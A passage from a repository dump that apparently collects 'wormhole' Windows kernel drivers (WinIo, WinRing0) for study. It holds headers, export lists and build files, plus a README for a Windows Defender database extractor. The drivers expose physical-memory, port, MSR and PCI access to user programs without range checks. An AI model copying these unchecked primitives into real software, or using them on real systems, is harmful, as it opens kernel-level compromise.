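  if (g_Is64BitOS)
  {
    PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr;
  }
  else
  {
    // Avoid sign extension issues
    PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr;
  }

  PhysStruct.dwPhysMemSizeInBytes = 4;

  pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct);

  if (pdwLinAddr == NULL)
    return false;

  *pdwPhysVal = *pdwLinAddr;

  // Best effort: the value is already copied, so an unmap failure does not
  // change the result reported to the caller.
  UnmapPhysicalMemory(PhysStruct);

  return true;
}


// Writes dwPhysVal as one DWORD to physical address pbPhysAddr by mapping
// 4 bytes through the driver, storing the value and unmapping again.
// Returns false when the library is not initialized or the mapping fails.
//
// As with GetPhysLong, the target address is not range-checked here; the
// driver and the access control on its device are the only gate.
bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal)
{
  PDWORD pdwLinAddr;
  // Zero the request so the fields this function does not set reach the
  // driver as 0 rather than as leftover stack bytes.
  tagPhysStruct PhysStruct = {0};

  if (!IsWinIoInitialized)
    return false;

  if (g_Is64BitOS)
  {
    PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr;
  }
  else
  {
    // Avoid sign extension issues
    PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr;
  }

  PhysStruct.dwPhysMemSizeInBytes = 4;

  pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct);

  if (pdwLinAddr == NULL)
    return false;

  *pdwLinAddr = dwPhysVal;

  // Best effort: the store has already happened.
  UnmapPhysicalMemory(PhysStruct);

  return true;
}

--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/Phys32.h: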
-------------------------------------------------------------------------------- 1 | #ifndef PHYS32_H 2 | #define PHYS32_H 3 | 4 | extern DWORD (WINAPI *VxDCall)(DWORD Service, DWORD EAX_Reg, DWORD ECX_Reg); 5 | 6 | #endif -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/Port32.h: -------------------------------------------------------------------------------- 1 | #ifndef PORT32_H 2 | #define PORT32_H 3 | 4 | #pragma pack(1) 5 | 6 | struct GDT_DESCRIPTOR 7 | { 8 | WORD Limit_0_15; 9 | WORD Base_0_15; 10 | BYTE Base_16_23; 11 | BYTE Type : 4; 12 | BYTE System : 1; 13 | BYTE DPL : 2; 14 | BYTE Present : 1; 15 | BYTE Limit_16_19 : 4; 16 | BYTE Available : 1; 17 | BYTE Reserved : 1; 18 | BYTE D_B : 1; 19 | BYTE Granularity : 1; 20 | BYTE Base_24_31; 21 | }; 22 | 23 | struct CALLGATE_DESCRIPTOR 24 | { 25 | WORD Offset_0_15; 26 | WORD Selector; 27 | WORD ParamCount : 5; 28 | WORD Unused : 3; 29 | WORD Type : 4; 30 | WORD System : 1; 31 | WORD DPL : 2; 32 | WORD Present : 1; 33 | WORD Offset_16_31; 34 | }; 35 | 36 | struct GDTR 37 | { 38 | WORD wGDTLimit; 39 | DWORD dwGDTBase; 40 | }; 41 | 42 | #pragma pack() 43 | 44 | #endif -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | InitializeWinIo 3 | ShutdownWinIo 4 | MapPhysToLin 5 | UnmapPhysicalMemory 6 | GetPhysLong 7 | SetPhysLong 8 | GetPortVal 9 | SetPortVal 10 | InstallWinIoDriver 11 | RemoveWinIoDriver 12 | 
-------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WinIo", "WinIo.vcproj", "{DE9A75D4-D640-41B8-893B-A384FAF00738}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.Build.0 = Debug|Win32 16 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.ActiveCfg = Debug|x64 17 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.Build.0 = Debug|x64 18 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.ActiveCfg = Release|Win32 19 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.Build.0 = Release|Win32 20 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.ActiveCfg = Release|x64 21 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Developer Studio generated include file. 3 | // Used by WinIo.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1000 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/winio.h: -------------------------------------------------------------------------------- 1 | #ifndef WINIO_H 2 | #define WINIO_H 3 | 4 | #include "..\drv\winio_nt.h" 5 | 6 | #ifndef WINIO_DLL 7 | #define WINIO_API _declspec(dllimport) 8 | #else 9 | #define WINIO_API 10 | #endif 11 | 12 | extern "C" 13 | { 14 | WINIO_API bool _stdcall InitializeWinIo(); 15 | WINIO_API void _stdcall ShutdownWinIo(); 16 | WINIO_API PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct); 17 | WINIO_API bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct); 18 | WINIO_API bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal); 19 | WINIO_API bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal); 20 | WINIO_API bool _stdcall GetPortVal(WORD wPortAddr, PDWORD pdwPortVal, BYTE bSize); 21 | WINIO_API bool _stdcall SetPortVal(WORD wPortAddr, DWORD dwPortVal, BYTE bSize); 22 | WINIO_API bool _stdcall InstallWinIoDriver(PWSTR pszWinIoDriverPath, bool IsDemandLoaded = false); 23 | WINIO_API bool _stdcall 
RemoveWinIoDriver(); 24 | } 25 | 26 | extern HANDLE hDriver; 27 | extern bool IsWinIoInitialized; 28 | extern bool g_Is64BitOS; 29 | 30 | bool _stdcall StartWinIoDriver(); 31 | bool _stdcall StopWinIoDriver(); 32 | 33 | #endif 34 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Drv/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Drv/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=WinIo 2 | TARGETPATH=. 3 | TARGETTYPE=DRIVER 4 | NTDEBUG=ntsd 5 | 6 | SOURCES= winio.c 7 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Drv/winio_nt.h: -------------------------------------------------------------------------------- 1 | #ifndef WINIONT_H 2 | #define WINIONT_H 3 | 4 | // Define the various device type values. Note that values used by Microsoft 5 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use 6 | // by customers. 7 | 8 | #define FILE_DEVICE_WINIO 0x00008010 9 | 10 | // Macro definition for defining IOCTL and FSCTL function control codes. 11 | // Note that function codes 0-2047 are reserved for Microsoft Corporation, 12 | // and 2048-4095 are reserved for customers. 
13 | 14 | #define WINIO_IOCTL_INDEX 0x810 15 | 16 | // Define our own private IOCTL 17 | // Every code below is built with METHOD_BUFFERED and FILE_ANY_ACCESS, so the I/O manager does not require read or write access on the device handle; which callers may open the device is decided by the device object's security descriptor, not by this header. NOTE(review): judging by their names these codes cover physical-memory mapping and port I/O - confirm how winio.c creates and ACLs the device object. 18 | #define IOCTL_WINIO_MAPPHYSTOLIN CTL_CODE(FILE_DEVICE_WINIO, \ 19 | WINIO_IOCTL_INDEX, \ 20 | METHOD_BUFFERED, \ 21 | FILE_ANY_ACCESS) 22 | 23 | #define IOCTL_WINIO_UNMAPPHYSADDR CTL_CODE(FILE_DEVICE_WINIO, \ 24 | WINIO_IOCTL_INDEX + 1, \ 25 | METHOD_BUFFERED, \ 26 | FILE_ANY_ACCESS) 27 | 28 | #define IOCTL_WINIO_ENABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \ 29 | WINIO_IOCTL_INDEX + 2, \ 30 | METHOD_BUFFERED, \ 31 | FILE_ANY_ACCESS) 32 | 33 | #define IOCTL_WINIO_DISABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \ 34 | WINIO_IOCTL_INDEX + 3, \ 35 | METHOD_BUFFERED, \ 36 | FILE_ANY_ACCESS) 37 | 38 | #define IOCTL_WINIO_READPORT CTL_CODE(FILE_DEVICE_WINIO, \ 39 | WINIO_IOCTL_INDEX + 4, \ 40 | METHOD_BUFFERED, \ 41 | FILE_ANY_ACCESS) 42 | 43 | #define IOCTL_WINIO_WRITEPORT CTL_CODE(FILE_DEVICE_WINIO, \ 44 | WINIO_IOCTL_INDEX + 5, \ 45 | METHOD_BUFFERED, \ 46 | FILE_ANY_ACCESS) 47 | 48 | #pragma pack(push) 49 | #pragma pack(1) 50 | // Five 64-bit fields under 1-byte packing (40 bytes). winio.h passes this structure to MapPhysToLin() and UnmapPhysicalMemory(); presumably it is the buffer exchanged for the MAPPHYSTOLIN/UNMAPPHYSADDR requests - confirm field direction and validation against winio.c. 51 | struct tagPhysStruct 52 | { 53 | DWORD64 dwPhysMemSizeInBytes; 54 | DWORD64 pvPhysAddress; 55 | DWORD64 PhysicalMemoryHandle; 56 | DWORD64 pvPhysMemLin; 57 | DWORD64 pvPhysSection; 58 | }; 59 | // 7 bytes under pack(1): a 16-bit port address, a 32-bit value and bSize (presumably the access width). Presumably used with READPORT/WRITEPORT; the accepted bSize values are not visible here - TODO confirm. 60 | struct tagPortStruct 61 | { 62 | USHORT wPortAddr; 63 | ULONG dwPortVal; 64 | UCHAR bSize; 65 | }; 66 | 67 | #pragma pack(pop) 68 | 69 | #endif 70 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/README.md: -------------------------------------------------------------------------------- 1 | # WinRing0 2 | Windows Ring0 Access 3 | 4 | ###File Directory 5 | 6 | >dll 7 | * driver source 8 | 9 | >drv 10 | * driver normal interface 11 | 12 | ##Description 13 | Allow user application to access ring0 level resource 14 | 15 | * access cpu msr register 16 | * read/write memory directly 17 | * io pci device 18 | * etc... 
19 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/Driver.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | #define OLS_DRIVER_INSTALL 1 13 | #define OLS_DRIVER_REMOVE 2 14 | #define OLS_DRIVER_SYSTEM_INSTALL 3 15 | #define OLS_DRIVER_SYSTEM_UNINSTALL 4 16 | 17 | BOOL ManageDriver(LPCTSTR DriverId, LPCTSTR DriverPath, USHORT Function); -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsApi.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | 3 | GetDllStatus @1 4 | GetDllVersion @2 5 | GetDriverVersion @3 6 | GetDriverType @4 7 | 8 | InitializeOls @7 9 | DeinitializeOls @8 10 | 11 | IsCpuid @11 12 | IsMsr @12 13 | IsTsc @13 14 | 15 | Hlt @20 16 | Rdmsr @21 17 | Wrmsr @22 18 | Rdpmc @23 19 | Cpuid @24 20 | Rdtsc @25 21 | 22 | HltTx @30 23 | RdmsrTx @31 24 | WrmsrTx @32 25 | RdpmcTx @33 26 | CpuidTx @34 27 | RdtscTx @35 28 | 29 | HltPx @40 30 | RdmsrPx @41 31 | WrmsrPx @42 32 | RdpmcPx @43 33 | CpuidPx @44 34 | RdtscPx @45 35 | 36 | ReadIoPortByte @51 37 | ReadIoPortWord @52 38 | ReadIoPortDword @53 39 | WriteIoPortByte @54 40 | WriteIoPortWord @55 41 | WriteIoPortDword @56 42 | 43 | ReadIoPortByteEx @61 44 | ReadIoPortWordEx @62 45 | ReadIoPortDwordEx @63 46 | WriteIoPortByteEx @64 47 | WriteIoPortWordEx @65 48 | WriteIoPortDwordEx @66 49 | 50 | SetPciMaxBusIndex @70 51 | 52 | ReadPciConfigByte @81 53 | ReadPciConfigWord @82 54 | 
ReadPciConfigDword @83 55 | WritePciConfigByte @84 56 | WritePciConfigWord @85 57 | WritePciConfigDword @86 58 | FindPciDeviceById @87 59 | FindPciDeviceByClass @88 60 | 61 | ReadPciConfigByteEx @91 62 | ReadPciConfigWordEx @92 63 | ReadPciConfigDwordEx @93 64 | WritePciConfigByteEx @94 65 | WritePciConfigWordEx @95 66 | WritePciConfigDwordEx @96 67 | 68 | ;ReadDmiMemory @100 69 | ;ReadPhysicalMemory @101 70 | ;WritePhysicalMemory @102 71 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsDef.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | //----------------------------------------------------------------------------- 13 | // 14 | // DLL Status Code 15 | // 16 | //----------------------------------------------------------------------------- 17 | 18 | #define OLS_DLL_NO_ERROR 0 19 | #define OLS_DLL_UNSUPPORTED_PLATFORM 1 20 | #define OLS_DLL_DRIVER_NOT_LOADED 2 21 | #define OLS_DLL_DRIVER_NOT_FOUND 3 22 | #define OLS_DLL_DRIVER_UNLOADED 4 23 | #define OLS_DLL_DRIVER_NOT_LOADED_ON_NETWORK 5 24 | #define OLS_DLL_UNKNOWN_ERROR 9 25 | 26 | //----------------------------------------------------------------------------- 27 | // 28 | // Driver Type 29 | // 30 | //----------------------------------------------------------------------------- 31 | 32 | #define OLS_DRIVER_TYPE_UNKNOWN 0 33 | #define OLS_DRIVER_TYPE_WIN_9X 1 34 | #define OLS_DRIVER_TYPE_WIN_NT 2 35 | #define OLS_DRIVER_TYPE_WIN_NT4 3 // Obsolete 36 | #define OLS_DRIVER_TYPE_WIN_NT_X64 4 37 | #define 
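OLS_DRIVER_TYPE_WIN_NT_IA64 5 // Reserved 38 | 39 | //----------------------------------------------------------------------------- 40 | // 41 | // PCI Error Code 42 | // 43 | //----------------------------------------------------------------------------- 44 | 45 | #define OLS_ERROR_PCI_BUS_NOT_EXIST (0xE0000001L) 46 | #define OLS_ERROR_PCI_NO_DEVICE (0xE0000002L) 47 | #define OLS_ERROR_PCI_WRITE_CONFIG (0xE0000003L) 48 | #define OLS_ERROR_PCI_READ_CONFIG (0xE0000004L) 49 | 50 | //----------------------------------------------------------------------------- 51 | // 52 | // Support Macros 53 | // 54 | //----------------------------------------------------------------------------- 55 | // PCI device address layout used by the macros below: bits 15..8 bus, bits 7..3 device, bits 2..0 function. Each argument and each whole expansion is parenthesized so that an expression argument, or an operator applied to the macro result, is not regrouped by C precedence. 56 | // Bus Number, Device Number and Function Number to PCI Device Address 57 | #define PciBusDevFunc(Bus, Dev, Func) ((((Bus)&0xFF)<<8) | (((Dev)&0x1F)<<3) | ((Func)&7)) 58 | // PCI Device Address to Bus Number 59 | #define PciGetBus(address) (((address)>>8) & 0xFF) 60 | // PCI Device Address to Device Number 61 | #define PciGetDev(address) (((address)>>3) & 0x1F) 62 | // PCI Device Address to Function Number 63 | #define PciGetFunc(address) ((address)&7) 64 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsDll.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007-2009 OpenLibSys.org. All rights reserved. 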
8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | //----------------------------------------------------------------------------- 13 | // 14 | // Version Information 15 | // 16 | //----------------------------------------------------------------------------- 17 | 18 | #define OLS_MAJOR_VERSION 1 19 | #define OLS_MINOR_VERSION 3 20 | #define OLS_REVISION 0 21 | #define OLS_RELESE 18 22 | 23 | #define OLS_VERSION ((OLS_MAJOR_VERSION << 24) | (OLS_MINOR_VERSION << 16) |\ 24 | (OLS_REVISION << 8) | OLS_RELESE) 25 | 26 | //----------------------------------------------------------------------------- 27 | // 28 | // Defines 29 | // 30 | //----------------------------------------------------------------------------- 31 | 32 | #define OLS_DRIVER_FILE_NAME_WIN_9X _T("WinRing0.vxd") 33 | #define OLS_DRIVER_FILE_NAME_WIN_NT _T("WinRing0.sys") 34 | #define OLS_DRIVER_FILE_NAME_WIN_NT_X64 _T("WinRing0x64.sys") 35 | #define OLS_DRIVER_FILE_NAME_WIN_NT_IA64 _T("WinRing0ia64.sys") // Reserved 36 | 37 | //----------------------------------------------------------------------------- 38 | // 39 | // Prototypes 40 | // 41 | //----------------------------------------------------------------------------- 42 | 43 | DWORD Initialize(); 44 | void Deinitialize(); 45 | DWORD InitDriverInfo(); 46 | 47 | BOOL OpenDriver(); 48 | BOOL LoadDriver(TCHAR *DriverFileName, TCHAR *DriverId); 49 | BOOL UnloadDriver(TCHAR *DriverId); 50 | DWORD GetRefCount(); 51 | 52 | BOOL IsNT(); 53 | BOOL IsWow64(); -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsDll.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINRING0/dll/OlsDll.rc -------------------------------------------------------------------------------- 
/source/WormholeDrivers/WINRING0/dll/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by OlsDll.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1001 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #include "stdafx.h" 11 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/stdafx.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007-2008 OpenLibSys.org. All rights reserved. 
8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | #ifndef WINVER 13 | #define WINVER 0x0400 14 | #endif 15 | 16 | #ifndef _WIN32_WINNT 17 | #define _WIN32_WINNT 0x0400 18 | #endif 19 | 20 | #ifndef _WIN32_WINDOWS 21 | #define _WIN32_WINDOWS 0x0410 22 | #endif 23 | 24 | #ifndef _WIN32_IE 25 | #define _WIN32_IE 0x0600 26 | #endif 27 | 28 | #define WIN32_LEAN_AND_MEAN 29 | #include 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/sys/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/sys/OpenLibSys.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define VER_FILETYPE VFT_DRV 5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM 6 | 7 | #define VER_FILEDESCRIPTION_STR "WinRing0" 8 | #define VER_INTERNALNAME_STR "WinRing0.sys" 9 | 10 | ///////////////////////////////////////////////////////////////////////////// 11 | // 12 | // Version 13 | // 14 | 15 | VS_VERSION_INFO VERSIONINFO 16 | FILEVERSION 1, 2, 0, 5 17 | PRODUCTVERSION 1, 2, 0, 5 18 | FILEFLAGSMASK 0x3fL 19 | FILEFLAGS 0x0L 20 | FILEOS 0x40004L 21 | FILETYPE 0x2L 22 | FILESUBTYPE 0x0L 23 | BEGIN 24 | BLOCK "StringFileInfo" 25 | BEGIN 26 | BLOCK "041104b0" 27 | BEGIN 28 | VALUE "Comments", "The modified BSD license\0" 29 | VALUE "CompanyName", "OpenLibSys.org\0" 30 | VALUE "FileDescription", "WinRing0\0" 31 | VALUE "FileVersion", "1.2.0.5\0" 32 | VALUE "InternalName", 
"WinRing0.sys\0" 33 | VALUE "LegalCopyright", "Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\0" 34 | VALUE "OriginalFilename", "WinRing0.sys\0" 35 | VALUE "ProductName", "WinRing0\0" 36 | VALUE "ProductVersion", "1.2.0.5\0" 37 | END 38 | END 39 | BLOCK "VarFileInfo" 40 | BEGIN 41 | VALUE "Translation", 0x411, 1200 42 | END 43 | END 44 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/sys/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=WinRing0 2 | TARGETPATH=lib 3 | TARGETTYPE=DRIVER 4 | 5 | INCLUDES=..\ 6 | 7 | SOURCES=OpenLibSys.c OpenLibSys.rc 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/vxd/Makefile: -------------------------------------------------------------------------------- 1 | #----------------------------------------------------------------------------- 2 | # Author : hiyohiyo 3 | # Mail : hiyohiyo@crystalmark.info 4 | # Web : http://openlibsys.org/ 5 | # License : The modified BSD license 6 | # 7 | # Copyright 2007 hiyohiyo, All rights reserved. 8 | #----------------------------------------------------------------------------- 9 | # 10 | # How to build on Windows XP SP1 DDK (Win Me Free Build Environment) 11 | # 12 | # 0. Get Windows XP SP1 DDK from MSDN 13 | # 1. Install Windows XP SP1 DDK with Win Me support 14 | # 2. Open "Win Me Free Build Environment" 15 | # 3. cd (WinRing0)\source\dll\vxd 16 | # 4. 
nmake 17 | # 18 | # Compile Options 19 | #_OPEN_LIB_SYS= 20 | 21 | !ifdef _OPEN_LIB_SYS 22 | VXDFILE = OpenLibSys.vxd 23 | !else 24 | VXDFILE = WinRing0.vxd 25 | !endif 26 | 27 | OBJDIR = bin 28 | VXDWRAPSDIR = $(DDKROOT)\lib\win_me\ 29 | 30 | RC16 = $(DDKROOT)\bin\win_me\bin16\rc 31 | ML = $(DDKROOT)\bin\win_me\bin\ml 32 | CL = $(DDKROOT)\bin\x86\cl 33 | LINK = $(DDKROOT)\bin\x86\link 34 | 35 | !ifdef DEBUG 36 | DDEBUG =-DDEBLEVEL=1 -DDEBUG 37 | !else 38 | DDEBUG =-DDEBLEVEL=0 39 | !endif 40 | 41 | CFLAGS = -Zdp -Gs -c -DIS_32 $(DDEBUG) 42 | LFLAGS = -machine:i386 -debug:none kernel32.lib 43 | AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -Zd -c -Cx -DMASM6 44 | 45 | all: direxist $(OBJDIR)\OpenLS.vxd 46 | 47 | direxist: 48 | if not exist $(OBJDIR)\nul md $(OBJDIR) 49 | 50 | $(OBJDIR)\OpenLS.res: OpenLS.rc 51 | $(RC16) -Fo$@ -r OpenLS.rc 52 | 53 | $(OBJDIR)\OpenLS.obj: OpenLS.c 54 | $(CL) $(CFLAGS) -Fo$@ %s 55 | 56 | $(OBJDIR)\ctrl.obj: ctrl.asm 57 | $(ML) $(AFLAGS) -Fo$@ %s 58 | 59 | $(OBJDIR)\OpenLS.vxd: $(OBJDIR)\OpenLS.obj $(OBJDIR)\ctrl.obj\ 60 | $(OBJDIR)\OpenLS.res OpenLS.def 61 | echo >NUL @< 36 | clc 37 | ret 38 | EndProc OPENLS_Control 39 | 40 | public C Exec_VxD_Int_rap 41 | Exec_VxD_Int_rap proc 42 | push dword ptr 1ah 43 | VmmCall Exec_VxD_Int 44 | ret 45 | Exec_VxD_Int_rap endp 46 | 47 | VxD_LOCKED_CODE_ENDS 48 | 49 | end 50 | -------------------------------------------------------------------------------- /source/WormholeDrivers/readme.txt: -------------------------------------------------------------------------------- 1 | Collection of "wormhole" open source drivers widely used by hardware vendors sometimes in unmodified state. 
2 | 3 | MAPMEM - NTDDK 3.51 example from 1993, multiple usage, noticeable usage by Gigabyte, SuperMicro 4 | PHYMEM - by akui, multiple usage, noticeable usage by Realtek, SuperMicro 5 | WINIO - by Yariv Kaplan, multiple usage, main source of inspiration for the ENETECH I/O drivers 6 | WINRING0 - by hiyohiyo, multiple usage, literally everywhere 7 | INPOUT - by Phillip Gibbon, based on hwinterface by Logix4U. 8 | 9 | (c) drivers authors -------------------------------------------------------------------------------- /source/wdextract/README.md: -------------------------------------------------------------------------------- 1 | 2 | # wdextract 3 | ## Extract Windows Defender database from vdm files and unpack it 4 | 5 | Based on original PowerShell script https://gist.github.com/mattifestation/3af5a472e11b7e135273e71cb5fed866 6 | 7 | Rewritten in C++ because it is much faster than any script. 8 | 9 | ### Usage wdextract "vdm filename" 10 | 11 | + This program is distributed as-is; 12 | + Uses ZLIB Data Compression Library (https://github.com/madler/zlib); 13 | + Built with MSVC 2017 with SDK 17763. 
14 | -------------------------------------------------------------------------------- /source/wdextract/wdextract.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.539 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wdextract", "wdextract\wdextract.vcxproj", "{08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.ActiveCfg = Debug|x64 17 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.Build.0 = Debug|x64 18 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.ActiveCfg = Debug|Win32 19 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.Build.0 = Debug|Win32 20 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.ActiveCfg = Release|x64 21 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.Build.0 = Release|x64 22 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.ActiveCfg = Release|Win32 23 | 